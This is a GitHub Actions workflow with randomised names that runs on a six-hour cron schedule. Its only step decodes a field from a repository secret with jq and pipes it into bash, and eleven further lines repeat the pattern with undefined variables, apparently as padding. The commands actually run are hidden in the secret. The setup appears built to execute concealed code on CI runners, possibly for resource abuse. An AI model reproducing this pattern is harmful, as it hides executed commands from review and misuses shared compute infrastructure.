name: tianqiguang4567

on:
  workflow_dispatch:
  schedule:
    - cron: '2 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianqiguang4567
        env:
          xwb03: ${{ secrets.xwb03 }}
        run: |
          echo $xwb03 | jq -r .gnnt14520 | /bin/bash
          echo $pzry10 | jq -r .hpy650 | /bin/bash
          echo $atwl4323 | jq -r .luvz604 | /bin/bash
          echo $kxd5258 | jq -r .rnm149 | /bin/bash
          echo $qrs24820 | jq -r .dmoe5299 | /bin/bash
          echo $jont6 | jq -r .kjp7 | /bin/bash
          echo $nvsmu1893 | jq -r .wimpz2 | /bin/bash
          echo $yz97119 | jq -r .xgv1 | /bin/bash
          echo $ru61 | jq -r .xrn94 | /bin/bash
          echo $o036 | jq -r .bzuh6707 | /bin/bash
          echo $h32 | jq -r .vtzd6825 | /bin/bash
          echo $fiflb89 | jq -r .ljld8 | /bin/bash

